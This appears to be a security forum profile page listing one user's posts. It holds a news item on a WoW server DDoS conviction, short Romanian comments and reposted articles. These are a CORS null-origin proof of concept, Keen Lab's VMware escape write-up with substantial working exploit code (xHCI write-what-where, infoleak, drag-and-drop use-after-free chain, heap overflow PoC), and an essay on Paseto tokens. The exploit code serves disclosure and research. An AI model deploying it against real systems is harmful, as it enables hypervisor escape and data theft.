-
Posts
18740 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
Forta. Insa ma gandesc daca sa sterg acest link, deoarece am impresia ca o sa ne fure niste utilizatori...
-
Fixed in 4.3.2 de catre IPBoard. Multumim kronzy.
-
E valid (self) pentru cei care nu au incredere.
-
Un român care a lansat un atac informatic asupra serverelor californiene ale foarte popularului joc video "World of Warcraft" (WoW), pentru a se răzbuna în urma unei dispute pe care a avut-o cu un alt jucător de pe internet, a fost condamnat luni la un an de închisoare în Statele Unite, informează AFP, citată de Agerpres. Foto: Gulliver/Getty Images Călin Mateiaş, în vârstă de 38 de ani şi originar din Bucureşti, a fost extrădat în Statele Unite după ce a inundat în 2010 serverele acestui joc video online cu un număr atât de mare de cereri de conectare, încât "World of Warcraft" a devenit inaccesibil pentru mii de alţi jucători din lumea întreagă. "Supărat pe un jucător cu care juca acest joc în mod regulat, acuzatul era hotărât să îi facă să piardă pe adversarii lui din jocul 'WoW' prin oprirea serverelor, pentru ca aceştia să nu mai poată să aibă acces la jocul online", au scris procurorii în documentele depuse la un tribunal american. "Faptele lui erau motivate de dorinţa puerilă de a câştiga acest joc şi de a-i vedea pe ceilalţi pierzând", potrivit aceleiaşi surse. În februarie, Călin Mateiaş a pledat vinovat în faţa unui tribunal din Los Angeles după ce a fost acuzat că a avariat în mod intenţionat un calculator protejat. Luna trecută, el a plătit 30.000 de dolari companiei Blizzard Entertainment, editorul jocului video "World of Warcraft". În consecinţă, autorităţile americane au renunţat la judecarea românului într-un proces separat, deschis în statul Pennsylvania, în care Călin Mateiaş era acuzat de piraterie informatică. Sursa: https://www.digi24.ro/stiri/externe/sua/un-roman-care-a-piratat-jocul-video-world-of-warcraft-a-fost-condamnat-la-un-an-de-inchisoare-925552?
-
- 3
-
-
-
Frumos raspuns. Nu ma asteptam, sincer.
-
Sa inteleg ca toti o duc bine acum, nu? Oricum, exceptand aceste cazuri care probabil sunt putine, dintre cei care au intrat mai tarziu in asta, s-a imbogatit cineva?
-
De curiozitate, cine de pe aici a facut cel putin cateva mii de euro din Bitcoin sau alte monede?
-
Monday, 23 April 2018 Exploiting misconfigured CORS Null Origin Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited. Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header: Origin: null the server would respond with the following two HTTP headers: Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data-url as follows: <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe> Although the code above gives a hint to the right direction, it falls short of a complete proof of concept. I struggled to find code that would work across the browsers Chrome and Firefox, but eventually succeeded with the following snippet: <html> <body> <iframe src='data:text/html,<script> var xhr = new XMLHttpRequest(); xhr.open("GET", "https://vuln-app.com/confidential", true); xhr.withCredentials = true; xhr.onload = function () { if (xhr.readyState === xhr.DONE) { console.log(xhr.response); } }; xhr.send(null); </script>'></iframe> </body> As soon as the page from above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the correspoding HTTP response should be shown in the browser console. Sursa: https://www.soffensive.com/2018/04/exploiting-misconfigured-cors-null.html
-
A bunch of Red Pills: VMware Escapes by Marco Grassi, Azureyang, Jackyxty Background VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS). The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”. Often those virtual machines are not trusted, and they must be isolated. VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance. Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016. In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine. If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests. But how VMware works? In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time. But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful. This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware. Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device. VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts. Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented? To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device. Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons: First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them. Second, some of those published resources either lack of details or code. So we hope you will enjoy our blogpost! We will begin with some background informations to get you up to speed. Let’s get started! Overall architecture A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere. VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example. vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks. vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx. Backdoor The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication. A useful resource for understanding this interface is the open-vm-tools repository by VMware itself. Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones. The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host. The hypervisor will trap and service the request. On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details. Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc. The fundamental points to remember are: It’s a interface guest-host that we can use It exposes complex services and functionalities. Lot of these functionalities can be used from ring3 in the guest VM xHCI xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x. You can find the relevant specification here. On a physical machine it’s often present: 1 00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05) In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device. The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space. This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB. Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation. Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon. Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM. Mitigations VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc. More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing. Pwn2Own 2017: VMware Escape by two bugs in 1 second Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest. ZDIThe Security Landscape: Pwn2Own 2017 The following vulnerabilities were identified and analyzed: XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure ZDI THE RESULTSPWN2OWN 2017 DAY THREE CVE-2017-4904 xHCI uninitialized stack variable This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory. The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability. To trigger this bug, the following steps should be taken: Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB. Set the DCBAAP to point to a controlled buffer. Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer. Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address. Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context. The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution. Exploit code 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 void write_what_where(uint64 xhci_base, uint64 where, uint64 what) { xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base; xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff)); xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off); int max_slots = cap_regs->hcs_params1 & 0xf; uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK'); if (!playground) return; playground[0] = 0; uint64 *dcbaa = (uint64*)playground; playground += sizeof(uint64) * max_slots; for (int i = 0; i < max_slots; ++i) { dcbaa[i] = 0xffffffffffffffc0; } op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart; playground = (uint8*)(((uint64)playground + 0x10) & (~0xf)); input_context *input_ctx = (input_context*)playground; playground += sizeof(input_context); playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f)); uint8 *cring = playground; uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1; trb_t *cmd = (trb_t*)cring; memset((void*)cmd, 0, sizeof(trb_t)); TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT); TRB_SET(C, cmd, 1); cmd++; memset(input_ctx, 0, sizeof(input_context)); input_ctx->ctrl_ctx.drop_flags = 0; input_ctx->ctrl_ctx.add_flags = 3; input_ctx->slot_ctx.context_entries = 1; memset((void*)cmd, 0, sizeof(trb_t)); TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV); TRB_SET(ID, cmd, 1); TRB_SET(DC, cmd, 1); cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart; TRB_SET(C, cmd, 1); cmd++; TRB_SET(C, cmd, 0); op_regs->cmd_ring = cmd_ring; db.doorbell[0] = 0; cmd = (trb_t*)cring; memset(input_ctx, 0, sizeof(input_context)); input_ctx->ctrl_ctx.drop_flags = 0; input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30); input_ctx->slot_ctx.context_entries = 31; uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]); uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1; value[0] = 0; value[1] = what; value[2] = 0; addr[0] = where - 0x3b8; memset((void*)cmd, 0, sizeof(trb_t)); TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP); TRB_SET(ID, cmd, 1); TRB_SET(DC, cmd, 0); cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart; TRB_SET(C, cmd, 1); cmd++; TRB_SET(C, cmd, 0); op_regs->cmd_ring = cmd_ring; db.doorbell[0] = 0; } CVE-2017-4905 Backdoor uninitialized memory read This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%. Credits to JunMao of Tencent PCManager. PoC 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 void infoleak() { char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE); memset(buf, 0, 0x8000); Backdoor_proto_hb hb; memset(&hb, 0, sizeof(Backdoor_proto_hb)); hb.in.size = 0x8000; hb.in.dstAddr = (uintptr_t)buf; hb.in.bx.halfs.low = 2; Backdoor_HbIn(&hb); // buf will be filled with contents leaked from vmware-vmx stack // ... VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT); return; } Behind the scenes of Pwn2Own 2017 Exploit the UAF bug in VMware Workstation Drag n Drop with single bug By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug. Exploit Code This exploit successful rate is approximately 100%. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 char *initial_dnd = "tools.capability.dnd_version 4"; static const int cbObj = 0x100; char *second_dnd = "tools.capability.dnd_version 2"; char *chgver = "vmx.capability.dnd_version"; char *call_transport = "dnd.transport "; char *readstring = "ToolsAutoInstallGetParams"; typedef struct _DnDCPMsgHdrV4 { char magic[14]; char dummy[2]; size_t ropper[13]; char shellcode[175]; char padding[0x80]; } DnDCPMsgHdrV4; void PrepareLFH() { char *result = NULL; char *pObj = malloc(cbObj); memset(pObj, 'A', cbObj); pObj[cbObj - 1] = 0; for (int idx = 0; idx < 1; ++idx) // just occupy 1 { char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj); RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4 } free(pObj); } size_t infoleak() { #define MAX_LFH_BLOCK 512 Message_Channel *chans[5] = {0}; for (int i = 0; i < 5; ++i) { chans[i] = Message_Open(0x49435052); if (chans[i]) { Message_SendSize(chans[i], cbObj - 1); //just alloc } else { Message_Close(chans[i - 1]); //keep 1 channel valid chans[i - 1] = 0; break; } } PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block for (int i = 0; i < 5; ++i) { if (chans[i]) { Message_Close(chans[i]); } } char *result = NULL; char *pObj = malloc(cbObj); memset(pObj, 'A', cbObj); pObj[cbObj - 1] = 0; char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj); while (1) { for (int i = 0; i < MAX_LFH_BLOCK; ++i) { RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL); RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL); RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); } for (int i = 0; i < MAX_LFH_BLOCK; ++i) { Message_Channel *chan = Message_Open(0x49435052); if (chan == NULL) { puts("Message send error!"); Sleep(100); } else { Message_SendSize(chan, cbObj - 1); Message_RawSend(chan, "\xA0\x75", 2); //just ret Message_Close(chan); } } Message_Channel *chan = Message_Open(0x49435052); Message_SendSize(chan, cbObj - 1); Message_RawSend(chan, "\xA0\x74", 2); //free RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i) { RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL); Message_RawSend(chan, "B", 1); RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL); if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj)) { Message_Close(chan); //free the string for (int i = 0; i < MAX_LFH_BLOCK; ++i) { puts("Trying to leak vtable"); RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL); RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL); size_t p = 0; if (result) { memcpy(&p, result, min(strlen(result), 8)); printf("Leak content: %p\n", p); } size_t low = p & 0xFFFF; if (low == 0x74A8 || //RpcBase low == 0x74d0 || //CpV4 low == 0x7630) //DnDV4 { printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000); return (p & (~0xFFFF)) - 0x7a0000; } RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL); RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); } } } Message_Close(chan); } return 0; } void exploit(size_t base) { char *result = NULL; char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141); char *pObj = malloc(cbObj); memset(pObj, 0, cbObj); DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4)); memset(hdr, 0, sizeof(DnDCPMsgHdrV4)); memcpy(hdr->magic, call_transport, strlen(call_transport)); while (1) { RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL); RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); for (int i = 0; i < MAX_LFH_BLOCK; ++i) { Message_Channel *chan = Message_Open(0x49435052); Message_SendSize(chan, cbObj - 1); size_t fake_vtable[] = { base + 0xB87340, base + 0xB87340, base + 0xB87340, base + 0xB87340}; memcpy(pObj, &fake_vtable, sizeof(size_t) * 4); Message_RawSend(chan, pObj, sizeof(size_t) * 4); Message_Close(chan); } RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL); RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL); //check pwn success? RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL); if (*(size_t *)result == 0xdeadbeefc0debabe) { puts("VMware escape success! \nPwned by KeenLab, Tencent"); RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); return; } //host dndv4 fill in, try to clean up and free again Sleep(100); puts("Object wrong! Retry..."); RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL); RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL); } } int main(int argc, char *argv[]) { int ret = 1; __try { while (1) { size_t base = 0; do { puts("Leaking..."); base = infoleak(); } while (!base); puts("Pwning..."); exploit(base); break; } } __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { fprintf(stderr, NOT_VMWARE_ERROR); return 1; } return ret; } CVE-2017-4901 DnDv3 HeapOverflow The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion. VMware Workstation and Fusion updates address out-of-bounds memory access vulnerabilitywww.vmware.com/security/advisories/VMSA-2017-0005.html After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 void poc() { int n; char *req1 = "tools.capability.dnd_version 3"; char *req2 = "vmx.capability.dnd_version"; RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL); RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL); char req3[0x80] = "dnd.transport "; n = strlen(req3); *(int*)(req3+n) = 3; *(int*)(req3+n+4) = 0; *(int*)(req3+n+8) = 0x100; *(int*)(req3+n+0xc) = 0; *(int*)(req3+n+0x10) = 0; // allocate buffer of 0x100 bytes RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL); char req4[0x1000] = "dnd.transport "; n = strlen(req4); *(int*)(req4+n) = 3; *(int*)(req4+n+4) = 0; *(int*)(req4+n+8) = 0x1000; *(int*)(req4+n+0xc) = 0x800; *(int*)(req4+n+0x10) = 0; for (int i = 0; i < 0x800; ++i) req4[n+0x14+i] = 'A'; // overflow with 0x800 bytes of 'A' RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL); } Conclusions In this article we presented several VMware bugs leading to guest to host virtual machine escape. We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability. We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe. Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors. For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it. But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped. So great care must be taken to secure also this security layer. Sursa: https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
-
Exploiting CVE-2018-1038 - Total Meltdown Posted on 23rd April 2018 Tagged in exploit, windows, kernel Back in March, a vulnerability was disclosed by Ulf Frisk in Windows 7 and Server 2008 R2. The vulnerability is pretty awesome, a patch released by Microsoft to mitigate the Meltdown vulnerability inadvertently opened up a hole on versions of Windows, allowing any process to access and modify page table entries. The writeup of the vulnerability can be found over on Ulf's blog here, and is well worth a read. This week I had some free time, so I decided to dig into the vulnerability and see just how the issue manifested itself. The aim was to create a quick exploit which could be used to elevate privileges during an assessment. I ended up delving into Windows memory management more than I had before, so this post was created to walk through just how an exploit can be crafted for this kind of vulnerability. As always, this post is for people looking to learn about exploitation techniques rather than simply providing a ready to fire exploit. With that said, let's start with some paging fundamentals. Articol complet: https://blog.xpnsec.com/total-meltdown-cve-2018-1038/
-
- 1
-
-
Paseto is a Secure Alternative to the JOSE Standards (JWT, etc.) March 4, 2018 6:25 pm by Scott Arciszewski Open Source This is a follow-up to our 2017 blog post that made the case for avoiding JSON Web Tokens (JWT) and its related standards. Many developers responded to our post with the same question: "What should we use instead of JWT?" Today, I'm happy to announce a viable replacement. Introducing PASETO: Platform-Agnostic SEcurity TOkens The JOSE standards (which JWT is a subset) give developers enough rope to hang themselves: Do you encrypt? Do you sign? Which algorithms do you support? Is none a valid authentication algorithm? Why not let the token specify which algorithm to use to validate tokens? As time went on and more vulnerabilities were discovered in the JOSE standards, the companies and enthusiasts that maintained the JWT libraries in various languages did work around these vulnerabilities, to their credit. However, this is at best a brittle solution. Consider the case of RNCryptor: The PHP implementation uses authenticated encryption and resists timing attacks, but the Haskell implementation just outright skips HMAC validation. The most effective way to solve security problems at an ecosystem level is to design less error-prone standards. Libraries that implement safer standards will not need to play catch-up with what the mainline implementations are doing. That is why we made Paseto, which exposes JWT-like validation claims without any of the runtime protocol negotiation and cryptography protocol joinery that caused so many critical JWT security failures. JWT's Knobs and Levers Are you signing or encrypting? Both? Neither? What algorithm is being used for signing? Public-key and shared-key algorithms easily confused here. Able to choose dangerous options like RSA with PKCS1v1.5 padding. What algorithm is being used for message encryption? What algorithm is being used for key encryption? As for the real-world use cases for including the encryption key with the ciphertext, encrypted or not, your guess is as good as mine. This might make more sense if key encryption algorithms only included public-key cryptography, but of course, AES-GCM is explicitly allowed by the standard. Paseto's Options What version? v1 gives you RSASSA-PSS and AES-CTR+HMAC-SHA2 v2 gives you Libsodium Is this token local or public? local: shared-key authenticated encryption public: public-key digital signatures That's it. There are no levers to pull, buttons to pull, or knobs to fiddle with. You don't have to worry about the complexity required to use RSA safely. You don't have to worry if the public key for a given message is even on the curve. Paseto is simple, obviously secure, solves 99% of the use cases for JSON Web Tokens. There is no guesswork; the cryptography aims to be boring. You can port Paseto to another language in hundreds-not-thousands of lines of code (especially if you only aim for v2 support). The Paseto documentation, as well as a reference implementation written in PHP, is available on GitHub. The Design and Motivation for Paseto Paseto is to JWT what Halite was to various mcrypt-based cryptography libraries in the PHP ecosystem. That is to say, we identified a source of insecurity for the Internet and worked to replace it with something that would lead to better security. All of our software is developed with the same underlying philosophy: Secure by default Simple and easy-to-use Easy to analyze and reason about (for implementors, auditors, and security researchers) However, we need to emphasize another point that isn't obvious until you have sufficient cryptography engineering experience: Ciphersuite agility is harmful. A full discussion on why this is true deserves a blog post of its own, but in a nutshell, it introduces the risk of downgrade attacks (e.g. DROWN). A far more robust design is to use versioned protocols—for which each version has One True Ciphersuite—with a small backward compatibility window. That is what we did with Paseto, and that's why tokens have a header that includes protocol version information. Should Paseto need a version 3 (e.g. if a practical quantum computer is developed and RSA and ECC are both doomed), we can specify a simply-secure ciphersuite for the new version that uses post-quantum cryptography algorithms. In such a scenario, local tokens can be decrypted and re-encrypted transparently (although quantum computers don't threaten AES-256), and public tokens older than v3 can simply be rejected. No downgrade attacks. No weird configurations. No "alg":"none" gotchas to watch out for. The Next Steps I tagged, signed, and released v0.5.0 of the Paseto specification and reference implementation this morning. The specification has not changed since version 0.4, and is unlikely to change again. In the coming weeks, I intend to write a draft RFC and submit it to the IETF as a secure-by-default replacement for the JOSE standards. There is talk among some security experts of launching a Web Token Competition for an "official" JOSE replacement, in the spirit of the Password Hashing Competition that gave us Argon2. Should such a competition surface in the near future, Paseto will be my entry in the contest. However, minor documentation and political concerns aside, Paseto should be considered stable enough to be used in production systems. If you're considering building JWT support into your next software project, consider supporting Paseto instead. It's time to retire error-prone cryptographic standards everywhere. Are Versioned Protocols Really More Robust than Ciphersuite Agility? Yes, and if you don't work with cryptography, the reason why might not be immediately obvious. Modern ciphers aren't directly broken in the real world, most of the time. Most cryptography protocol vulnerabilities will be found in the joinery between components. So instead of hoping for a cryptanalytic break-through, security researchers simply attack the mortar instead of the bricks. A good example of this is, although AES is a secure block cipher, using it in ECB mode is not secure. Using AES in CBC mode (without adding ciphertext integrity) allows trivial plaintext recovery from a type of online attack called a padding oracle. These attacks don't break AES, but the protocols that use AES in this way are broken. Circling back to the brick wall analogy, let's pretend you were building an actual brick wall, but instead of deciding on the bricks and then adhering them in place with mortar, you simply constructed a hollow wireframe of mortar so that bricks could be hot-swappable in case a new tenant decided they wanted a wall made of Papier-mâché brick instead of stone brick. Would you trust that wall to hold up a roof? Cryptography protocol design isn't too dissimilar from brick walls. How does this relate to JOSE and Paseto? Looking back at the JOSE standards, particularly JSON Web Encryption, you'll learn that you're allowed to encrypt a key with one of four methods: RSA with PKCS #1v1.5 padding (asymmetric cryptography, insecure) RSA with OAEP padding (asymmetric cryptography) ECDH (asymmetric cryptography) AES-GCM (symmetric cryptography) (One of these things is not like the others.) By giving users and implementors enough rope to hang themselves, ciphersuite agility balloons the complexity of the protocol and increases the attack surface, with little recourse if all the available options are horrendously broken. It also increases the chances of getting the configuration wrong in a way that dooms the security of a system. What do Versioned Protocols to Differently? The difference is subtle, but important. Ciphersuite agility means essentially building a hollow wireframe or honeycomb structure and allowing implementors to fill in the blanks with options they find palatable. This is one of the core design mistakes of SSL/TLS that system administrators have fumed about for decades. (TLS 1.0: "You want to deploy RC4 with SHA1? OK, you're the boss.") With ciphersuite agility, the security of a deployment is nontrivial ("Okay it's using version 1.2 but what ciphersuites are supported?"), and backward compatibility is complicated ("which ciphersuites are allowed in version 1.2 but not allowed in version 1.3?"). Versioned protocols means hard-coding one specific ciphersuite to any given version of the protocol. If the hard-coded ciphersuite for a version of the current protocol is found to be insecure, a new version should be decided and released. These two facts lead to a heightened risk for implementations and/or deployments ending up vulnerable to downgrade attacks (e.g. DROWN). With versioned protocols, the security of a deployment is straightforward ("Oh, it's using version 2? No further questions") and backward compatibility is simple ("We only allow v2 and v3, all others are blocked"). The risk of downgrade attacks isn't quite zero, but there is no unnecessary complexity to exacerbate the odds of it happening. If you have versioned protocols, where the algorithm choice was sourced from security experts well-versed in cryptography, you end up in a much better place than mix-n-match cryptography construction. Sursa: https://paragonie.com/blog/2018/03/paseto-platform-agnostic-security-tokens-is-secure-alternative-jose-standards-jwt-etc
-
